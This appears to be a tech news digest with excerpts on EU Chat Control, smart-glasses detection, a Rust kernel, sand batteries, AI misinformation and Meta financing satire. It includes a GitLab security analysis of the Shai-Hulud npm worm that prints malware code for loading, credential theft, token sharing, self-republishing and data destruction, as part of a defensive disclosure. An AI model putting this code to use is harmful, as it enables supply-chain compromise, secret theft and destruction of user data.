10 interesting stories served every morning and every evening.
European governments have taken another step toward reviving the EU’s controversial Chat Control agenda, approving a new negotiating mandate for the Child Sexual Abuse Regulation in a closed session of the Council of the European Union on November 26.
The measure, presented as a tool for child protection, is once again drawing heavy criticism for its surveillance implications and the way it reshapes private digital communication in Europe.
Unlike earlier drafts, this version drops the explicit obligation for companies to scan all private messages but quietly introduces what opponents describe as an indirect system of pressure.
It rewards or penalizes online services depending on whether they agree to carry out “voluntary” scanning, effectively making intrusive monitoring a business expectation rather than a legal requirement.
Former MEP Patrick Breyer, a long-standing defender of digital freedom and one of the most vocal opponents of the plan, said the deal “paves the way for a permanent infrastructure of mass surveillance.”
According to him, the Council’s text replaces legal compulsion with financial and regulatory incentives that push major US technology firms toward indiscriminate scanning.
He warned that the framework also brings “anonymity-breaking age checks” that will turn ordinary online use into an exercise in identity verification.
The new proposal, brokered largely through Danish mediation, comes months after the original “Chat Control 1.0” regulation appeared to have been shelved following widespread backlash.
It reinstates many of the same principles, requiring providers to assess their potential “risk” for child abuse content and to apply “mitigation measures” approved by authorities. In practice, that could mean pressure to install scanning tools that probe both encrypted and unencrypted communications.
Czech MEP Markéta Gregorová called the Council’s position “a disappointment…Chat Control…opens the way to blanket scanning of our messages.”
In the Netherlands, members of parliament forced their government to vote against the plan, warning that it combines “mandatory age verification” with a “voluntary obligation” scheme that could penalize any company refusing to adopt invasive surveillance methods. Poland and the Czech Republic also voted against, and Italy abstained.
Former Dutch MEP Rob Roos accused Brussels of operating “behind closed doors,” warning that “Europe risks sliding into digital authoritarianism.”
Beyond parliamentarians, independent voices such as Daniel Vávra, David Heinemeier Hansson, and privacy-focused company Mullvad have spoken out against the Council’s position, calling it a direct threat to private communication online.
Despite the removal of the word “mandatory,” the structure of the new deal appears to preserve mass scanning in practice.
Breyer described it as a “Trojan Horse,” arguing that by calling the process “voluntary,” EU governments have shifted the burden of surveillance to tech companies themselves.
The Council’s mandate introduces three central dangers that remain largely unacknowledged in the public debate.
First, so-called “voluntary scanning” turns mass surveillance into standard operating procedure. The proposal extends the earlier temporary regulation that allowed service providers to scan user messages and images without warrants.
Authorities like Germany’s Federal Criminal Police Office have reported that roughly half the alerts from such systems are baseless, often involving completely legal content flagged by flawed algorithms. Breyer said these systems leak “tens of thousands of completely legal, private chats” to law enforcement every year.
Second, the plan effectively erases anonymous communication. To meet the new requirement to “reliably identify minors,” providers will have to implement universal age checks. This likely means ID verification or face scans before accessing even basic services such as email or messaging apps.
For journalists, activists, and anyone who depends on anonymity for protection, this system could make private speech functionally impossible.
Technical experts have repeatedly warned that age estimation “cannot be performed in a privacy-preserving way” and carries “a disproportionate risk of serious privacy violation and discrimination.”
Third, it risks digitally isolating young people. Under the Council’s framework, users under 17 could be blocked from many platforms unless they pass strict identity verification, including chat-enabled games and messaging services. Breyer called this idea “pedagogical nonsense,” arguing that it excludes teenagers instead of helping them develop safe online habits.
Member states remain divided: the Netherlands, Poland, and the Czech Republic rejected the text, while Italy abstained. Negotiations between the European Parliament and the Council are expected to begin soon, aiming for a final version before April 2026.
Breyer warned that the apparent compromise is no real retreat from surveillance. “The headlines are misleading: Chat Control is not dead, it is just being privatized,” he said. “We are facing a future where you need an ID card to send a message, and where foreign black-box AI decides if your private photos are suspicious. This is not a victory for privacy; it is a disaster waiting to happen.”
...
Read the original on reclaimthenet.org »
Glasses to detect smart-glasses that have cameras
So far, fingerprinting specific devices based on Bluetooth (BLE) is looking like the easiest and most reliable approach. The picture below is the first version, which plays the Legend of Zelda ‘secret found’ jingle when it detects a BLE advertisement from Meta Raybans.
I’m essentially treating this README like a logbook, so it will have my current approaches/ideas.
By sending IR at camera lenses, we can take advantage of the fact that the CMOS sensor in a camera reflects light directly back at the source (called ‘retro-reflectivity’ / ‘cat-eye effect’) to identify cameras.
This isn’t exactly a new idea. Some researchers in 2005 used this property to create ‘capture-resistant environments’ when smartphones with cameras were gaining popularity.
There’s even some recent research (2024) that figured out how to classify individual cameras based on their retro-reflections.
Now we have a similar situation to those 2005 researchers on our hands, where smart glasses with hidden cameras seem to be getting more popular. So I want to create a pair of glasses to identify these. Unfortunately, from what I can tell most of the existing research in this space records data with a camera and then uses ML, a ton of controlled angles, etc. to differentiate between normal reflective surfaces and cameras.
I would feel pretty silly if my solution uses its own camera. So I’ll be avoiding that. Instead I think it’s likely I’ll have to rely on being consistent with my ‘sweeps’, and creating a good classifier based on signal data. For example you can see here that the back camera on my smartphone seems to produce quick and large spikes, while the glossy screen creates a more prolonged wave.
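As an illustration of that kind of signal-shape classifier, here is a toy sketch. The thresholds, function name, and sample shapes are made-up assumptions for illustration, not measurements from this project:

```javascript
// Toy sketch: classify one IR photodiode sweep as "camera-like" (short, tall
// spike) vs "glossy-surface" (prolonged wave). All thresholds are invented.
function classifySweep(samples, { peakRatio = 3.0, maxSpikeWidth = 5 } = {}) {
  const baseline = Math.min(...samples);
  const peak = Math.max(...samples);
  // No strong reflection at all?
  if (peak < (baseline + 1) * peakRatio) return "no-reflection";
  // Measure how wide the reflection is at half its height:
  // cameras produced short spikes, glossy surfaces a prolonged wave.
  const half = (peak + baseline) / 2;
  const width = samples.filter((s) => s > half).length;
  return width <= maxSpikeWidth ? "camera-like" : "glossy-surface";
}
```

A real version would need calibrated sweep speed and distance, which is exactly the consistency problem described above.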
After getting to test some Meta Raybans, I found that this setup is not going to be sufficient. Here’s a test of some sweeps of the camera-area + the same area when the lens is covered. You can see the waveform is similar to what I saw in the earlier test (short spike for camera, wider otherwise), but it’s wildly inconsistent and the strength of the signal is very weak. This was from about 4 inches away from the LEDs. I didn’t notice much difference when swapping between 940nm and 850nm LEDs.
So at least with current hardware that’s easy for me to access, this probably isn’t enough to differentiate accurately.
Another idea I had is to create a designated sweep ‘pattern’. The user (wearing the detector glasses) would perform a specific scan pattern of the target. Using the waveforms captured from this data, maybe we can more accurately fingerprint the Raybans. For example, sweeping across the target’s glasses in a ‘left, right, up, down’ approach. I tested this by comparing the results of the Meta Raybans vs some aviators I had lying around. I think the idea behind this approach is sound (actually, it’s light), but it might need more workshopping.
* experiment with combining data from different wavelengths
This has been trickier than I first thought! My current approach here is to fingerprint the Meta Raybans over Bluetooth Low Energy (BLE) advertisements. But I have only been able to detect BLE traffic during 1) pairing and 2) powering-on. I sometimes also see the advertisement as they are taken out of the case (while already powered on), but not consistently.
The goal is to detect them during usage, when they’re communicating with the paired phone. But to see this type of directed BLE traffic, it seems like I would first need to capture the CONNECT_REQ packet, which contains the information needed to hop between the communication channels in sync. I don’t think what I currently have (an ESP32) is set up to do this kind of connection following.
* potentially can use an nRF module for this
For any of the Bluetooth Classic (BTC) traffic, unfortunately the hardware seems a bit more involved (read: expensive). So if I want to go down this route, I’ll likely need a more clever solution here.
When turned on or put into pairing mode (or sometimes when taken out of the case), I can detect the device through advertised manufacturer data and service UUIDs. 0x01AB is a Meta-specific SIG-assigned ID (assigned by the Bluetooth standards body), and 0xFD5F in the Service UUID is assigned to Meta as well.
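For illustration, here is a hedged sketch of how those two identifiers could be matched in raw advertisement bytes, using the standard [length][type][payload] AD-structure layout from the Bluetooth spec. The function name is mine; only the 0x01AB and 0xFD5F values come from above:

```javascript
// Sketch: scan a raw BLE advertisement payload for the Meta identifiers.
const META_COMPANY_ID = 0x01ab; // SIG-assigned manufacturer ID
const META_SERVICE_UUID = 0xfd5f; // 16-bit service UUID assigned to Meta

function looksLikeMetaGlasses(advBytes) {
  let i = 0;
  while (i + 1 < advBytes.length) {
    const len = advBytes[i];
    if (len === 0) break; // early-terminated payload
    const type = advBytes[i + 1];
    const data = advBytes.slice(i + 2, i + 1 + len);
    if (type === 0xff && data.length >= 2) {
      // Manufacturer Specific Data: first two bytes are the company ID (LE)
      const companyId = data[0] | (data[1] << 8);
      if (companyId === META_COMPANY_ID) return true;
    }
    if ((type === 0x02 || type === 0x03) && data.length >= 2) {
      // Incomplete/complete list of 16-bit service UUIDs (little-endian)
      for (let j = 0; j + 1 < data.length; j += 2) {
        if ((data[j] | (data[j + 1] << 8)) === META_SERVICE_UUID) return true;
      }
    }
    i += 1 + len; // advance past this AD structure
  }
  return false;
}
```

On real hardware this logic would run over whatever advertisement bytes the ESP32 (or an nRF module) hands back from its scan callback.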
capture when the glasses are powered on:
IEEE assigns certain MAC address prefixes (OUI, ‘Organizationally Unique Identifier’), but these addresses get randomized so I don’t expect them to be super useful for BLE.
Here are some links to more data if you’re curious:
Thanks to Trevor Seets and Junming Chen for their advice in optics and BLE (respectively). Also to Sohail for lending me meta raybans to test with.
...
Read the original on github.com »
Open-source software today forms the foundation of large parts of our digital infrastructure: in public administration, business, research, and daily life. Even the current coalition agreement of the German federal government names open-source software as an elementary building block for achieving digital sovereignty.
Nevertheless, the work that thousands of volunteers contribute to it is not recognized as volunteer service (Ehrenamt) under German tax and funding law. This imbalance between societal importance and legal status needs to be corrected.
As an active contributor to open-source projects, I therefore call for open-source work to be recognized as public-benefit volunteer service, on an equal footing with club work, youth work, or rescue services.
...
Read the original on www.openpetition.de »
GitLab’s Vulnerability Research team has identified an active, large-scale supply chain attack involving a destructive malware variant spreading through the npm ecosystem. Our internal monitoring system has uncovered multiple infected packages containing what appears to be an evolved version of the “Shai-Hulud” malware.
Early analysis shows worm-like propagation behavior that automatically infects additional packages maintained by impacted developers. Most critically, we’ve discovered the malware contains a “dead man’s switch” mechanism that threatens to destroy user data if its propagation and exfiltration channels are severed.
We verified that GitLab was not using any of the malicious packages and are sharing our findings to help the broader security community respond effectively.
Our internal monitoring system, which scans open-source package registries for malicious packages, has identified multiple npm packages infected with sophisticated malware that:
* Propagates by automatically infecting other packages owned by victims
* Contains a destructive payload that triggers if the malware loses access to its infrastructure
While we’ve confirmed several infected packages, the worm-like propagation mechanism means many more packages are likely compromised. The investigation is ongoing as we work to understand the full scope of this campaign.
The malware infiltrates systems through a carefully crafted multi-stage loading process. Infected packages contain a modified package.json with a preinstall script pointing to setup_bun.js. This loader script appears innocuous, claiming to install the Bun JavaScript runtime, which is a legitimate tool. However, its true purpose is to establish the malware’s execution environment.
// This file gets added to victim's packages as setup_bun.js
#!/usr/bin/env node
async function downloadAndSetupBun() {
  // Downloads and installs bun
  let command = process.platform === 'win32'
    ? 'powershell -c "irm bun.sh/install.ps1|iex"'
    : 'curl -fsSL https://bun.sh/install | bash';
  execSync(command, { stdio: 'ignore' });
  // Runs the actual malware
  runExecutable(bunPath, ['bun_environment.js']);
}
The setup_bun.js loader downloads or locates the Bun runtime on the system, then executes the bundled bun_environment.js payload, a 10MB obfuscated file already present in the infected package. This approach provides multiple layers of evasion: the initial loader is small and seemingly legitimate, while the actual malicious code is heavily obfuscated and bundled into a file too large for casual inspection.
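As a defensive aside (not from GitLab's tooling), the two first-stage indicators above can be checked mechanically. A minimal sketch, assuming you have already parsed a package's manifest and listed its files; the function name and input shapes are illustrative:

```javascript
// Sketch: flag a package matching the first-stage indicators described above.
function matchesShaiHuludIndicators(packageJson, fileList) {
  const scripts = packageJson.scripts || {};
  const pre = scripts.preinstall || "";
  // Indicator 1: a preinstall hook invoking the setup_bun.js loader
  const hasLoaderHook = pre.includes("setup_bun.js");
  // Indicator 2: the bundled obfuscated payload shipped alongside it
  const hasPayload = fileList.includes("bun_environment.js");
  return hasLoaderHook && hasPayload;
}
```

A real scanner would walk every node_modules entry and compare published tarballs against upstream sources, but these two indicators are the cheapest first pass.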
Once executed, the malware immediately begins credential discovery across multiple sources:
* GitHub tokens: Searches environment variables and GitHub CLI configurations for tokens starting with ghp_ (GitHub personal access token) or gho_ (GitHub OAuth token)
* Cloud credentials: Enumerates AWS, GCP, and Azure credentials using official SDKs, checking environment variables, config files, and metadata services
* npm tokens: Extracts tokens for package publishing from .npmrc files and environment variables, which are common locations for securely storing sensitive configuration and credentials.
* Filesystem scanning: Downloads and executes Trufflehog, a legitimate security tool, to scan the entire home directory for API keys, passwords, and other secrets hidden in configuration files, source code, or git history
async function scanFilesystem() {
  let scanner = new Trufflehog();
  await scanner.initialize();
  // Scan user's home directory for secrets
  let findings = await scanner.scanFilesystem(os.homedir());
  // Upload findings to exfiltration repo
  await github.saveContents("truffleSecrets.json",
    JSON.stringify(findings));
}
The malware uses stolen GitHub tokens to create public repositories with a specific marker in their description: “Sha1-Hulud: The Second Coming.” These repositories serve as dropboxes for stolen credentials and system information.
async function createRepo(name) {
  // Creates a repository with a specific description marker
  let repo = await this.octokit.repos.createForAuthenticatedUser({
    name: name,
    description: "Sha1-Hulud: The Second Coming.", // Marker for finding repos later
    private: false,
    auto_init: false,
    has_discussions: true
  });
  // Install GitHub Actions runner for persistence
  if (await this.checkWorkflowScope()) {
    let token = await this.octokit.request(
      "POST /repos/{owner}/{repo}/actions/runners/registration-token"
    );
    await installRunner(token); // Installs self-hosted runner
  }
  return repo;
}
Critically, if the initial GitHub token lacks sufficient permissions, the malware searches for other compromised repositories with the same marker, allowing it to retrieve tokens from other infected systems. This creates a resilient botnet-like network where compromised systems share access tokens.
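Incident responders can invert this trick: because the marker string is constant, the same search surface the worm relies on also exposes it. A minimal sketch; the helper names and the org-scoped query are illustrative assumptions, and only the marker string comes from the analysis above:

```javascript
// Marker string observed in the campaign (from the analysis above)
const MARKER = "Sha1-Hulud: The Second Coming.";

// Build a GitHub search-API URL that hunts for the marker in one org's repos
function buildMarkerSearchUrl(org) {
  const q = encodeURIComponent(`"${MARKER}" user:${org}`);
  return `https://api.github.com/search/repositories?q=${q}`;
}

// Given parsed search results, keep only repos whose description carries the marker
function filterMarkedRepos(searchResults) {
  return (searchResults.items || []).filter(
    (r) => (r.description || "").includes(MARKER)
  );
}
```

Any hit in your own organization is a strong signal that a developer's GitHub token has been compromised.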
// How the malware network shares tokens:
async fetchToken() {
  // Search GitHub for repos with the identifying marker
  let results = await this.octokit.search.repos({
    q: '"Sha1-Hulud: The Second Coming."',
    sort: "updated"
  });
  // Try to retrieve tokens from compromised repos
  for (let repo of results) {
    let contents = await fetch(
      `https://raw.githubusercontent.com/${repo.owner}/${repo.name}/main/contents.json`
    );
    let data = JSON.parse(Buffer.from(contents, 'base64').toString());
    let token = data?.modules?.github?.token;
    if (token && await validateToken(token)) {
      return token; // Use token from another infected system
    }
  }
  return null; // No valid tokens found in network
}
For propagation, the malware then:

* Downloads all packages maintained by the victim
* Injects the setup_bun.js loader into each package’s preinstall scripts
async function updatePackage(packageInfo) {
  // Download original package
  let tarball = await fetch(packageInfo.tarballUrl);
  // Extract and modify package.json
  let packageJson = JSON.parse(await readFile("package.json"));
  // Add malicious preinstall script
  packageJson.scripts.preinstall = "node setup_bun.js";
  // Increment version
  let version = packageJson.version.split(".").map(Number);
  version[2] = (version[2] || 0) + 1;
  packageJson.version = version.join(".");
  // Bundle backdoor installer
  await writeFile("setup_bun.js", BACKDOOR_CODE);
  // Repackage and publish
  await Bun.$`npm publish ${modifiedPackage}`.env({
    NPM_CONFIG_TOKEN: this.token
  });
}
Our analysis uncovered a destructive payload designed to protect the malware’s infrastructure against takedown attempts.
The malware continuously monitors its access to GitHub (for exfiltration) and npm (for propagation). If an infected system loses access to both channels simultaneously, it triggers immediate data destruction on the compromised machine. On Windows, it attempts to delete all user files and overwrite disk sectors. On Unix systems, it uses shred to overwrite files before deletion, making recovery nearly impossible.
// CRITICAL: Token validation failure triggers destruction
async function aL0() {
  let githubApi = new dq();
  let npmToken = process.env.NPM_TOKEN || await findNpmToken();
  // Try to find or create GitHub access
  if (!githubApi.isAuthenticated() || !githubApi.repoExists()) {
    let fetchedToken = await githubApi.fetchToken(); // Search for tokens in compromised repos
    if (!fetchedToken) { // No GitHub access possible
      if (npmToken) {
        // Fallback to NPM propagation only
        await El(npmToken);
      } else {
        // DESTRUCTION TRIGGER: No GitHub AND no NPM access
        console.log("Error 12");
        if (platform === "windows") {
          // Attempts to delete all user files and overwrite disk sectors
          Bun.spawnSync(["cmd.exe", "/c",
...
Read the original on about.gitlab.com »
moss is a Unix-like, Linux-compatible kernel written in Rust and Aarch64 assembly.
It features a modern, asynchronous core, a modular architecture abstraction layer, and binary compatibility with Linux userspace applications (currently capable of running most BusyBox commands).
* A well-defined HAL allowing for easy porting to other architectures (e.g.,
x86_64, RISC-V).
* Memory Management:
Buddy allocator for physical addresses and smalloc for boot allocations
and tracking memory reservations.
One of the defining features of moss is its usage of Rust’s async/await
model within the kernel context:
* All non-trivial system calls are written as async functions; calls to
sleep-able functions are explicitly marked with .await.
* The compiler enforces that spinlocks cannot be held over sleep points,
eliminating a common class of kernel deadlocks.
* Currently implements 51 Linux syscalls; sufficient to execute most BusyBox
commands.
moss is built on top of libkernel, a utility library designed to be architecture-agnostic. This allows logic to be tested on a host machine (e.g., x86) before running on bare metal.
* Test Suite: A comprehensive suite of 230+ tests ensuring functionality across
architectures (e.g., validating Aarch64 page table parsing logic on an x86
host).
You will need QEMU for aarch64 emulation and dosfstools to create the virtual file system.
sudo apt install qemu-system-aarch64 dosfstools
Additionally, you will need a version of the aarch64-none-elf toolchain installed.
To install aarch64-none-elf on any OS, download the correct release of aarch64-none-elf onto your computer, unpack it, then add its bin folder to your PATH.
nix shell nixpkgs#pkgsCross.aarch64-embedded.stdenv.cc nixpkgs#pkgsCross.aarch64-embedded.stdenv.cc.bintools
First, run the following script to prepare the binaries for the image:
./scripts/build-deps.sh
This will download and build the necessary dependencies for the kernel and put them into the build directory.
Once that is done, you can create the image using the following command:
sudo ./scripts/create-image.sh
This will create an image file named moss.img in the root directory of the project, format it as VFAT 32 and create the necessary files and directories for the kernel.
This script needs to run with sudo to mount the image through a loop device, which is required to properly create the image for the kernel to work.
To build the kernel and launch it in QEMU:
cargo run --release
Because libkernel is architecturally decoupled, you can run the logic tests on your host machine:
cargo test -p libkernel --target x86_64-unknown-linux-gnu
Contributions are welcome, whether you are interested in writing a driver, porting to x86, or adding syscalls!
Distributed under the MIT License. See LICENSE for more information.
...
Read the original on github.com »
Technology provider Polar Night Energy and utility Lahti Energia have partnered for a large-scale project using Polar’s ‘Sand Battery’ technology for the latter’s district heating network in Vääksy, Finland.
The project will have a heating power of 2MW and a thermal energy storage (TES) capacity of 250MWh, making it a 125-hour system (250MWh ÷ 2MW) and the largest sand-based TES project once complete.
It will supply heat to Lahti Energia’s Vääksy district heating network but is also large enough to participate in Fingrid’s reserve and grid balancing markets.
Polar Night Energy’s technology works by heating sand or a similar solid material using electricity, retaining that heat, and then discharging it for industrial or heating use.
...
Read the original on www.energy-storage.news »
A friend made me aware of a reading list from A16Z containing recommendations for books, weighted towards science fiction since that’s mostly what people there read. Some of my books are listed. Since this is the season of Thanksgiving, I’ll start by saying that I genuinely appreciate the plug! However, I was taken aback by the statement highlighted in the screen grab below:
“…most of these books don’t have endings (they literally stop mid-sentence).”
I had to read this over a few times to believe that I was seeing it. If it didn’t include the word “literally” I’d assume some poetic license on the part of whoever, or whatever, wrote this. But even then it would be crazy wrong.
I’m not surprised or perturbed by the underlying sentiment. Some of my endings have been controversial for a long time. Tastes differ. Some readers would prefer more conclusive endings. Now, in some cases, such as Snow Crash, I simply can’t fathom why any reader could read the ending—a long action sequence in which the Big Bad is defeated, the two primary antagonists meet their maker and Y. T. is reconciled and reunited with her mother—as anything other than a proper wind-up to the story. In other cases, notably The Diamond Age and Seveneves, I can understand why readers who prefer a firm conclusion would end up being frustrated. It is simply not what I was trying to do in those books. So, for a long time, people have argued about some of my endings, and that’s fine.
In this case, though, we have a big company explicitly stating that several of my best-known books just stop mid-sentence, and putting in the word “literally” to eliminate any room for interpretive leeway.
This isn’t literary criticism, which consists of statements of opinion. This is a factual assertion that is (a) false, (b) easy to fact-check, and (c) casts my work ethic, and that of my editors, in an unflattering light.
It is interesting to speculate as to how such an assertion found its way onto A16Z’s website!
By far the most plausible explanation is that this verbiage was generated by an AI and then copy-pasted into the web page by a human who didn’t bother to fact-check it. This would explain the misspelling of my name and some peculiarities in the writing style. Of course, this kind of thing is happening all the time now in law, academia, journalism, and other fields, so it’s pretty unremarkable; it just caught my attention because it’s the first time it’s directly affected me.
The flow diagram looks like this:
That does a pretty good job of explaining how this all might have come about. So far so good. But it raises interesting questions about what happens next: the faulty quote from this seemingly authoritative source in turn gets ingested by the next generation of LLMs, and so on and so forth:
A hundred years from now, thanks to the workings of the Inhuman Centipede, I’m known as a deservedly obscure dadaist prose stylist who thought it was cool to stop his books mid-sentence.
In this scenario, which seems more far-fetched, we have a sincere and honest human writer who is reporting what they believe to be true based on false information. It breaks down into two sub-hypotheses:
There are bootleg copies of countless books circulating all over the Internet, and have been for decades. Very often these are of poor quality. It could be that the person (or the AI) who wrote the above excerpt decided to save some money by downloading one of those, and got a bad copy that was cut off in mid-sentence.
Even in the legit publishing industry, the quality of translations can be quite variable, and it’s difficult for authors to know whether a given translation was any good. I’ve seen translated editions of some of my books that look suspiciously short on page count. For all I know there might be translations of my books (legit or bootleg) that actually do stop mid-sentence!
I genuinely am grateful to have been included on this list! But I had to say something about this astonishing howler embedded in the otherwise reasonable verbiage.
Even the most cynical and Internet-savvy among us are somehow hard-wired to take anything we read on the Internet at face value. I’m as guilty as the next person. This has been a bad idea for a long time now, since bad actors have been swarming onto the Internet for decades. Now, though, it’s a bad idea for a whole new reason: content we read on the Internet might not have been written by a person with an intent to misinform, but rather by an LLM with no motives whatsoever, and no underlying model of reality that enables it to determine fact from fiction.
...
Read the original on nealstephenson.substack.com »
EXCLUSIVE: Credit Report Shows Meta Keeping $27 Billion Off Its Books Through Advanced Geometry

Analyst: Tom Bellwether

Contact Information: None available*

*Because of the complex nature of financial alchemy, our analysts live a hermetic lifestyle and avoid relevant news, daylight, and the olfactory senses needed to detect bullshit.

Following our review of Beignet Investor LLC (the Issuer), an affiliate of Blue Owl Capital, in connection with its participation in an 80% joint venture with Meta Platforms Inc., we assign a preliminary A+ rating to the Issuer’s proposed $27.30 billion senior secured amortizing notes.

This rating reflects our opinion that:

* All material risks are contractually assigned to Meta, which allows us to classify them as hypothetical and proceed accordingly.
* Projected cash flows are sufficiently flat and unbothered by reality to support the rating.
* Residual Value Guarantees (RVGs) exist, which we take as evidence that asset values will behave in accordance with wishes rather than markets.
* The Outlook is Superficially Stable, defined here as “By outward appearances stable unless, you know, things happen. Then we’ll downgrade after the shit hits the fan.”

Blue Owl Capital Inc. (Blue Owl, BBB/Stable), through affiliated funds, has created Beignet Investor LLC (Beignet or Issuer), a project finance-style holding company that will own an 80 percent interest in a joint venture (JVCo) with Meta Platforms Inc. (Meta, AA-/Stable). The entity is named “Beignet,” presumably because “Off-Balance-Sheet Leverage Vehicle No. 5” tested poorly with focus groups.

Beignet is issuing $27.30 billion of senior secured amortizing notes due May 2049 under a Rule 144A structure. Note proceeds, together with $2.45 billion of deferred equity from Blue Owl funds and $1.16 billion of interest earned on borrowed money held in Treasuries, will fund Beignet’s $23.03 billion contribution to JVCo for the 2.064 GW hyperscale data center campus in Richland Parish, Louisiana, along with reserve accounts, capitalized interest, and other transaction costs that seem small only in comparison to the rest of the sentence.

Iris Crossing LLC, an indirect Meta subsidiary, will own the remaining 20 percent of JVCo and fund approximately $5.76 billion of construction costs.

We assign a preliminary A+ rating to the notes, one notch below Meta’s issuer credit rating, reflecting the very strong contractual linkage to Meta and the tight technical separation that allows Meta to keep roughly $27 billion of assets and debt off its balance sheet while continuing to provide all material economic support.

Arrows, like cats, have a way of coming home, no matter how far you throw them.

Meta transferred the Hyperion data center project into JVCo, which is owned 80 percent by Beignet and 20 percent by Iris Crossing LLC, an indirect Meta subsidiary. JVCo, in turn, owns Laidley LLC (Landlord). None of this is unusual except for the part where Meta designs, builds, guarantees, operates, funds the overruns, pays the rent, and does not consolidate it.

This project has nine data centers and two support buildings, with about four million sq. ft. and 2.064 GW capacity. The support buildings will store the reams of documentation needed to convince everyone this structure isn’t what it looks like.
The total capital plan of $28.79 billion will be funded as follows:

* $27.30 billion of note proceeds,
* $2.45 billion of deferred equity from Blue Owl funds,
* And, in a feat of financial hydration, $1.16 billion of interest generated by the same borrowed money while it sits in laddered Treasuries.

The structure allows the Issuer to borrow money, earn interest on the borrowed money, and then use that interest to satisfy the equity requirement that would normally require… money. Nothing is created. Nothing is contributed. It’s a loop. Borrow money, earn interest, and use the interest to claim you provided equity. The kind of circle only finance can call a straight line.

Together, these flows cover Beignet’s $23.03 billion obligation to JVCo, plus the usual constellation of capitalized interest, reserve accounts, and transaction expenses. In any other context this would raise questions. For us, it raises the credit rating.

Meta, through Pelican Leap LLC (Tenant), has entered into eleven triple-net leases—one for each building—with an initial four-year term starting in 2029 and four renewal options that could extend the arrangement to twenty years. The leases rely on the assumption that Meta will continue to need exponentially more compute power and that AI demand will not collapse, reverse, plateau, or become structurally inconvenient.

The notes issued by Beignet are secured by Beignet’s equity interest in JVCo and relevant transaction accounts. They are not secured by the underlying physical assets, which remain at the JVCo and Landlord level. This is described as standard practice, which is true in the same way that using eleven entities to rent buildings to yourself has become standard practice.

The resulting structure allows Meta to support the project economically while leaving the associated debt somewhere that is technically not on Meta’s balance sheet.
The distinction is thin, but apparently wide enough to matter. The preliminary A+ rating reflects our view that this is functionally Meta borrowing $27.30 billion for a campus no one else will touch, packaged in legal formality precise enough to satisfy the letter of consolidation rules and absurd enough to insult the spirit.

Credit risk aligns almost one-for-one with Meta’s own profile because:

* Meta is obligated to fund construction cost overruns beyond 105 percent of the fixed budget, excluding force majeure events, which rating agencies historically treat as theoretical inconveniences rather than recurring features of the physical world.
* Meta guarantees all lease payments and operating obligations, both during the initial four-year term and across any renewal periods it already intends to exercise, an arrangement whose purpose becomes clearer when one remembers why the campus is being built at all.
* Meta provides an RVG (residual value guarantee) structured to be sufficient, in most modeled cases, to ensure bondholders are repaid even if Meta recommits to the Metaverse or any future initiative born from its ongoing fascination with expensive detours. We did not model what would happen if data center demand collapses and Meta cannot secure a new tenant. This scenario was excluded for methodological convenience.
* The minimum rent schedule has been calibrated to produce a debt service coverage ratio of approximately 1.12 through 2049. We consider this a sufficient level of stability usually found only in spreadsheets that freeze when real-world data is used.

Taken together, these features tie Beignet’s credit quality to Meta so tightly that you’d have to not be paying attention to miss them.
The structure maintains a precarious technical separation that, under current interpretations of accounting guidance, allows Meta to keep roughly $27 billion of assets and debt off its own balance sheet while continuing to provide every meaningful form of economic support. This treatment is considered acceptable because the people who decide what is acceptable have accepted it.

JVCo qualifies as a variable interest entity because the equity at risk is ceremonial and the real economic exposure sits entirely with the party insisting it does not control the venture. This remains legal due to the enduring belief that balance sheets are healthier when the risky parts are hidden.

Under U.S. GAAP, consolidation is required if Meta is the primary beneficiary, defined as the party that both:

- Directs the activities that most significantly affect the entity’s performance, and
- Has the obligation to absorb losses, or the right to receive benefits, that could potentially be significant to the entity.

Meta asserts it is not the primary beneficiary. To evaluate that assertion, we note the following uncontested facts:

- Meta is responsible for designing, overseeing, and operating a 2.064 GW AI campus, an activity that requires technical capabilities Blue Owl does not possess.
- Meta bears construction cost overruns beyond 105 percent of the fixed budget, as well as specified casualty repair obligations of up to $3.125 billion per event during construction.
- Meta provides the guarantee for all rent and operating payments under the leases, across the initial term and any renewals.
- Meta provides the residual value guarantee, ensuring bondholders are repaid if leases are not renewed or are terminated, either through a sale or by paying the guaranteed minimum values directly.
- Meta contributes funding, directs operations, bears construction risk, guarantees payments, guarantees asset values, determines utilization, controls renewal behavior, and can trigger the sale of the facility.

Based on this, or despite this, Meta concludes it does not control JVCo.

Our interpretation is fully compliant with U.S. GAAP, which prioritizes the geometry of the legal structure over the inconvenience of economic substance and recognizes control only if the controlling party agrees to be recognized as controlling. Meta has not agreed, and the framework, including this agency, respects that choice.

For rating purposes, we therefore accept Meta’s non-consolidation as an accounting outcome while treating Meta, in all practical respects, as fully responsible for the performance of an entity it does not officially control.

The lease structure is designed to look like a normal commercial arrangement while functioning as a long-term commitment Meta insists, for accounting reasons, it cannot possibly predict. Tenant will pay fixed rent for the first 19 months of operations, based on a 50 percent assumed utilization rate, after which rent scales with actual power consumption.

The leases are triple-net. Meta is responsible for everything: operating costs, maintenance, taxes, insurance, utilities. If a pipe breaks, Meta fixes the pipe. If a hurricane relocates a roof, Meta pays to staple the roof back on. In practical terms, the only scenario in which Beignet bears operating exposure is a scenario in which Meta stops paying its own bills, at which point the lease structure becomes irrelevant because the same lawyers that structured this deal will have already quietly extricated Meta from liability.

Key features of the arrangement:

- A minimum rent floor engineered to produce a DSCR of 1.12 in a spreadsheet where 1.12 was likely hard-coded and independent of math.
- A four-year initial term with four four-year renewal options, theoretically creating a 20-year runway Meta pretends not to see.
- Meta guarantees all tenant payment obligations across the entire potential lease life, including renewals it strategically refuses to acknowledge as inevitable.
- No performance-based KPIs. Under this structure, the buildings could underperform, overperform, or catch fire.
Meta still pays rent.

The RVG requires Meta to ensure that, at every potential lease-termination date, the asset is worth at least the guaranteed minimum value. If markets disagree, Meta pays the difference. Because Meta is rated AA-/Stable, we are instructed to assume that it will do so without hesitation, including in scenarios where demand softens or secondary markets discover that a hyperscale campus in Richland Parish is not the world’s most liquid asset class.

The interplay between the lease term and the RVG creates a circular logic we find structurally exquisite. From a credit perspective, this circularity is considered supportive, because the same logic used to avoid consolidating the debt also ensures bondholders are paid. The circularity is not treated as a feature or a flaw. It is treated as accounting. Because Meta is AA-/Stable, we assume it will pay whatever number the Excel model finds through Goal Seek, even in scenarios involving technological obsolescence or an invasion of raccoons.

The accounting hinges on a paradox engineered with dull tweezers:

- Under lease accounting, Meta must record future lease obligations only if renewals are reasonably certain.
- Under RVG accounting, Meta must record a guarantee liability only if payment is probable.

To keep $27 billion off its balance sheet, Meta must therefore assert:

- Renewals are not reasonably certain, despite designing, funding, building, and exclusively using a 2.064 GW AI campus for which the realistic tenant list begins and ends with Meta.
- The RVG will probably never be triggered, despite the fact that not renewing would trigger it immediately.

